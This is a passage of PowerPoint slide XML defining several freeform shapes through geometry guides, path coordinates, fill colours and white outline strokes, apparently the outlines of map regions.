              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36370" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3204" y="2961"/>
                <a:ext cx="177" cy="170"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 177"/>
                  <a:gd name="T1" fmla="*/ 1 h 170"/>
                  <a:gd name="T2" fmla="*/ 73 w 177"/>
                  <a:gd name="T3" fmla="*/ 0 h 170"/>
                  <a:gd name="T4" fmla="*/ 132 w 177"/>
                  <a:gd name="T5" fmla="*/ 33 h 170"/>
                  <a:gd name="T6" fmla="*/ 132 w 177"/>
                  <a:gd name="T7" fmla="*/ 39 h 170"/>
                  <a:gd name="T8" fmla="*/ 150 w 177"/>
                  <a:gd name="T9" fmla="*/ 54 h 170"/>
                  <a:gd name="T10" fmla="*/ 156 w 177"/>
                  <a:gd name="T11" fmla="*/ 62 h 170"/>
                  <a:gd name="T12" fmla="*/ 152 w 177"/>
                  <a:gd name="T13" fmla="*/ 79 h 170"/>
                  <a:gd name="T14" fmla="*/ 157 w 177"/>
                  <a:gd name="T15" fmla="*/ 90 h 170"/>
                  <a:gd name="T16" fmla="*/ 163 w 177"/>
                  <a:gd name="T17" fmla="*/ 96 h 170"/>
                  <a:gd name="T18" fmla="*/ 158 w 177"/>
                  <a:gd name="T19" fmla="*/ 106 h 170"/>
                  <a:gd name="T20" fmla="*/ 161 w 177"/>
                  <a:gd name="T21" fmla="*/ 108 h 170"/>
                  <a:gd name="T22" fmla="*/ 160 w 177"/>
                  <a:gd name="T23" fmla="*/ 115 h 170"/>
                  <a:gd name="T24" fmla="*/ 163 w 177"/>
                  <a:gd name="T25" fmla="*/ 134 h 170"/>
                  <a:gd name="T26" fmla="*/ 167 w 177"/>
                  <a:gd name="T27" fmla="*/ 142 h 170"/>
                  <a:gd name="T28" fmla="*/ 176 w 177"/>
                  <a:gd name="T29" fmla="*/ 148 h 170"/>
                  <a:gd name="T30" fmla="*/ 169 w 177"/>
                  <a:gd name="T31" fmla="*/ 155 h 170"/>
                  <a:gd name="T32" fmla="*/ 156 w 177"/>
                  <a:gd name="T33" fmla="*/ 161 h 170"/>
                  <a:gd name="T34" fmla="*/ 144 w 177"/>
                  <a:gd name="T35" fmla="*/ 165 h 170"/>
                  <a:gd name="T36" fmla="*/ 138 w 177"/>
                  <a:gd name="T37" fmla="*/ 161 h 170"/>
                  <a:gd name="T38" fmla="*/ 132 w 177"/>
                  <a:gd name="T39" fmla="*/ 169 h 170"/>
                  <a:gd name="T40" fmla="*/ 127 w 177"/>
                  <a:gd name="T41" fmla="*/ 170 h 170"/>
                  <a:gd name="T42" fmla="*/ 113 w 177"/>
                  <a:gd name="T43" fmla="*/ 170 h 170"/>
                  <a:gd name="T44" fmla="*/ 107 w 177"/>
                  <a:gd name="T45" fmla="*/ 165 h 170"/>
                  <a:gd name="T46" fmla="*/ 104 w 177"/>
                  <a:gd name="T47" fmla="*/ 166 h 170"/>
                  <a:gd name="T48" fmla="*/ 96 w 177"/>
                  <a:gd name="T49" fmla="*/ 169 h 170"/>
                  <a:gd name="T50" fmla="*/ 82 w 177"/>
                  <a:gd name="T51" fmla="*/ 168 h 170"/>
                  <a:gd name="T52" fmla="*/ 80 w 177"/>
                  <a:gd name="T53" fmla="*/ 158 h 170"/>
                  <a:gd name="T54" fmla="*/ 79 w 177"/>
                  <a:gd name="T55" fmla="*/ 147 h 170"/>
                  <a:gd name="T56" fmla="*/ 71 w 177"/>
                  <a:gd name="T57" fmla="*/ 137 h 170"/>
                  <a:gd name="T58" fmla="*/ 62 w 177"/>
                  <a:gd name="T59" fmla="*/ 136 h 170"/>
                  <a:gd name="T60" fmla="*/ 54 w 177"/>
                  <a:gd name="T61" fmla="*/ 131 h 170"/>
                  <a:gd name="T62" fmla="*/ 33 w 177"/>
                  <a:gd name="T63" fmla="*/ 122 h 170"/>
                  <a:gd name="T64" fmla="*/ 26 w 177"/>
                  <a:gd name="T65" fmla="*/ 119 h 170"/>
                  <a:gd name="T66" fmla="*/ 16 w 177"/>
                  <a:gd name="T67" fmla="*/ 101 h 170"/>
                  <a:gd name="T68" fmla="*/ 7 w 177"/>
                  <a:gd name="T69" fmla="*/ 89 h 170"/>
                  <a:gd name="T70" fmla="*/ 2 w 177"/>
                  <a:gd name="T71" fmla="*/ 80 h 170"/>
                  <a:gd name="T72" fmla="*/ 0 w 177"/>
                  <a:gd name="T73" fmla="*/ 63 h 170"/>
                  <a:gd name="T74" fmla="*/ 10 w 177"/>
                  <a:gd name="T75" fmla="*/ 55 h 170"/>
                  <a:gd name="T76" fmla="*/ 17 w 177"/>
                  <a:gd name="T77" fmla="*/ 43 h 170"/>
                  <a:gd name="T78" fmla="*/ 24 w 177"/>
                  <a:gd name="T79" fmla="*/ 35 h 170"/>
                  <a:gd name="T80" fmla="*/ 23 w 177"/>
                  <a:gd name="T81" fmla="*/ 32 h 170"/>
                  <a:gd name="T82" fmla="*/ 19 w 177"/>
                  <a:gd name="T83" fmla="*/ 30 h 170"/>
                  <a:gd name="T84" fmla="*/ 18 w 177"/>
                  <a:gd name="T85" fmla="*/ 22 h 170"/>
                  <a:gd name="T86" fmla="*/ 23 w 177"/>
                  <a:gd name="T87" fmla="*/ 21 h 170"/>
                  <a:gd name="T88" fmla="*/ 25 w 177"/>
                  <a:gd name="T89" fmla="*/ 16 h 170"/>
                  <a:gd name="T90" fmla="*/ 21 w 177"/>
                  <a:gd name="T91" fmla="*/ 6 h 170"/>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77"/>
                  <a:gd name="T139" fmla="*/ 0 h 170"/>
                  <a:gd name="T140" fmla="*/ 177 w 177"/>
                  <a:gd name="T141" fmla="*/ 170 h 170"/>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77" h="170">
                    <a:moveTo>
                      <a:pt x="20" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36371" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3204" y="2961"/>
                <a:ext cx="177" cy="170"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 177"/>
                  <a:gd name="T1" fmla="*/ 1 h 170"/>
                  <a:gd name="T2" fmla="*/ 73 w 177"/>
                  <a:gd name="T3" fmla="*/ 0 h 170"/>
                  <a:gd name="T4" fmla="*/ 132 w 177"/>
                  <a:gd name="T5" fmla="*/ 33 h 170"/>
                  <a:gd name="T6" fmla="*/ 132 w 177"/>
                  <a:gd name="T7" fmla="*/ 39 h 170"/>
                  <a:gd name="T8" fmla="*/ 150 w 177"/>
                  <a:gd name="T9" fmla="*/ 54 h 170"/>
                  <a:gd name="T10" fmla="*/ 156 w 177"/>
                  <a:gd name="T11" fmla="*/ 62 h 170"/>
                  <a:gd name="T12" fmla="*/ 152 w 177"/>
                  <a:gd name="T13" fmla="*/ 79 h 170"/>
                  <a:gd name="T14" fmla="*/ 157 w 177"/>
                  <a:gd name="T15" fmla="*/ 90 h 170"/>
                  <a:gd name="T16" fmla="*/ 163 w 177"/>
                  <a:gd name="T17" fmla="*/ 96 h 170"/>
                  <a:gd name="T18" fmla="*/ 158 w 177"/>
                  <a:gd name="T19" fmla="*/ 106 h 170"/>
                  <a:gd name="T20" fmla="*/ 161 w 177"/>
                  <a:gd name="T21" fmla="*/ 108 h 170"/>
                  <a:gd name="T22" fmla="*/ 160 w 177"/>
                  <a:gd name="T23" fmla="*/ 115 h 170"/>
                  <a:gd name="T24" fmla="*/ 163 w 177"/>
                  <a:gd name="T25" fmla="*/ 134 h 170"/>
                  <a:gd name="T26" fmla="*/ 167 w 177"/>
                  <a:gd name="T27" fmla="*/ 142 h 170"/>
                  <a:gd name="T28" fmla="*/ 176 w 177"/>
                  <a:gd name="T29" fmla="*/ 148 h 170"/>
                  <a:gd name="T30" fmla="*/ 169 w 177"/>
                  <a:gd name="T31" fmla="*/ 155 h 170"/>
                  <a:gd name="T32" fmla="*/ 156 w 177"/>
                  <a:gd name="T33" fmla="*/ 161 h 170"/>
                  <a:gd name="T34" fmla="*/ 144 w 177"/>
                  <a:gd name="T35" fmla="*/ 165 h 170"/>
                  <a:gd name="T36" fmla="*/ 138 w 177"/>
                  <a:gd name="T37" fmla="*/ 161 h 170"/>
                  <a:gd name="T38" fmla="*/ 132 w 177"/>
                  <a:gd name="T39" fmla="*/ 169 h 170"/>
                  <a:gd name="T40" fmla="*/ 127 w 177"/>
                  <a:gd name="T41" fmla="*/ 170 h 170"/>
                  <a:gd name="T42" fmla="*/ 113 w 177"/>
                  <a:gd name="T43" fmla="*/ 170 h 170"/>
                  <a:gd name="T44" fmla="*/ 107 w 177"/>
                  <a:gd name="T45" fmla="*/ 165 h 170"/>
                  <a:gd name="T46" fmla="*/ 104 w 177"/>
                  <a:gd name="T47" fmla="*/ 166 h 170"/>
                  <a:gd name="T48" fmla="*/ 96 w 177"/>
                  <a:gd name="T49" fmla="*/ 169 h 170"/>
                  <a:gd name="T50" fmla="*/ 82 w 177"/>
                  <a:gd name="T51" fmla="*/ 168 h 170"/>
                  <a:gd name="T52" fmla="*/ 80 w 177"/>
                  <a:gd name="T53" fmla="*/ 158 h 170"/>
                  <a:gd name="T54" fmla="*/ 79 w 177"/>
                  <a:gd name="T55" fmla="*/ 147 h 170"/>
                  <a:gd name="T56" fmla="*/ 71 w 177"/>
                  <a:gd name="T57" fmla="*/ 137 h 170"/>
                  <a:gd name="T58" fmla="*/ 62 w 177"/>
                  <a:gd name="T59" fmla="*/ 136 h 170"/>
                  <a:gd name="T60" fmla="*/ 54 w 177"/>
                  <a:gd name="T61" fmla="*/ 131 h 170"/>
                  <a:gd name="T62" fmla="*/ 33 w 177"/>
                  <a:gd name="T63" fmla="*/ 122 h 170"/>
                  <a:gd name="T64" fmla="*/ 26 w 177"/>
                  <a:gd name="T65" fmla="*/ 119 h 170"/>
                  <a:gd name="T66" fmla="*/ 16 w 177"/>
                  <a:gd name="T67" fmla="*/ 101 h 170"/>
                  <a:gd name="T68" fmla="*/ 7 w 177"/>
                  <a:gd name="T69" fmla="*/ 89 h 170"/>
                  <a:gd name="T70" fmla="*/ 2 w 177"/>
                  <a:gd name="T71" fmla="*/ 80 h 170"/>
                  <a:gd name="T72" fmla="*/ 0 w 177"/>
                  <a:gd name="T73" fmla="*/ 63 h 170"/>
                  <a:gd name="T74" fmla="*/ 10 w 177"/>
                  <a:gd name="T75" fmla="*/ 55 h 170"/>
                  <a:gd name="T76" fmla="*/ 17 w 177"/>
                  <a:gd name="T77" fmla="*/ 43 h 170"/>
                  <a:gd name="T78" fmla="*/ 24 w 177"/>
                  <a:gd name="T79" fmla="*/ 35 h 170"/>
                  <a:gd name="T80" fmla="*/ 23 w 177"/>
                  <a:gd name="T81" fmla="*/ 32 h 170"/>
                  <a:gd name="T82" fmla="*/ 19 w 177"/>
                  <a:gd name="T83" fmla="*/ 30 h 170"/>
                  <a:gd name="T84" fmla="*/ 18 w 177"/>
                  <a:gd name="T85" fmla="*/ 22 h 170"/>
                  <a:gd name="T86" fmla="*/ 23 w 177"/>
                  <a:gd name="T87" fmla="*/ 21 h 170"/>
                  <a:gd name="T88" fmla="*/ 25 w 177"/>
                  <a:gd name="T89" fmla="*/ 16 h 170"/>
                  <a:gd name="T90" fmla="*/ 21 w 177"/>
                  <a:gd name="T91" fmla="*/ 6 h 170"/>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77"/>
                  <a:gd name="T139" fmla="*/ 0 h 170"/>
                  <a:gd name="T140" fmla="*/ 177 w 177"/>
                  <a:gd name="T141" fmla="*/ 170 h 170"/>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77" h="170">
                    <a:moveTo>
                      <a:pt x="20" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36372" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2926" y="3217"/>
                <a:ext cx="210" cy="206"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 210"/>
                  <a:gd name="T1" fmla="*/ 162 h 206"/>
                  <a:gd name="T2" fmla="*/ 128 w 210"/>
                  <a:gd name="T3" fmla="*/ 195 h 206"/>
                  <a:gd name="T4" fmla="*/ 124 w 210"/>
                  <a:gd name="T5" fmla="*/ 199 h 206"/>
                  <a:gd name="T6" fmla="*/ 116 w 210"/>
                  <a:gd name="T7" fmla="*/ 206 h 206"/>
                  <a:gd name="T8" fmla="*/ 109 w 210"/>
                  <a:gd name="T9" fmla="*/ 205 h 206"/>
                  <a:gd name="T10" fmla="*/ 98 w 210"/>
                  <a:gd name="T11" fmla="*/ 205 h 206"/>
                  <a:gd name="T12" fmla="*/ 92 w 210"/>
                  <a:gd name="T13" fmla="*/ 203 h 206"/>
                  <a:gd name="T14" fmla="*/ 91 w 210"/>
                  <a:gd name="T15" fmla="*/ 196 h 206"/>
                  <a:gd name="T16" fmla="*/ 85 w 210"/>
                  <a:gd name="T17" fmla="*/ 191 h 206"/>
                  <a:gd name="T18" fmla="*/ 81 w 210"/>
                  <a:gd name="T19" fmla="*/ 191 h 206"/>
                  <a:gd name="T20" fmla="*/ 77 w 210"/>
                  <a:gd name="T21" fmla="*/ 196 h 206"/>
                  <a:gd name="T22" fmla="*/ 72 w 210"/>
                  <a:gd name="T23" fmla="*/ 199 h 206"/>
                  <a:gd name="T24" fmla="*/ 62 w 210"/>
